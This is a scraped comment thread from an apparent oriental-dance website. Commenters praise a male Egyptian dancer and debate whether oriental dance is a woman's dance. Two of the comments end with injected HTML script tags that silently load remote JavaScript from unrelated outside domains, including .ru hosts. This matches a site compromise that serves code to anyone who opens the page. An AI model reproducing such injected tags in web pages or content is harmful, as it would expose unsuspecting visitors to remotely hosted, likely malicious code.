Fine showmanship and elegance. My friends can stop talking about how sexy he was at the PA Folk Tours. He was trying to entice them to ooze out a Chifti. They were facinated by his feeling and passion for the dance.
I noticed that no one has commented. I keep seeing this question about whether oriental dance is a woman's dance being probed by various interviewers since my article and many were eager to say I was wrong; a newcomer making such a statement. I guess if a man says that oriental dance is a woman's dance than that makes it so. If a woman says it, it must be questioned, she's being sexist. If I feel it in my soul that it has a woman's sensuality and sensitivity, I must be wrong. But I'm merely a woman. What do I know.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |

I’m glad another voice from the Middle East echoed what I said in the past. This just confirms your feelings and my comments and don’t let anyone tell you otherwise. I’m sure there will be those that will discount his comments and will label him “Young”,
“Inexperienced” or the fact that he is from the Middle East it doesn’t give him any high grounds whatsoever.
Ziad.

His method of instruction is very effective. I Adore Egyptian music & love learning authentic folkloric dance. I can't wait to visit Egypt & just immerse myself in its beautiful culture of dance & music. I can say that I'm a devout addict to the dance. I hope to see Mohamed back in NYC very soon.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |
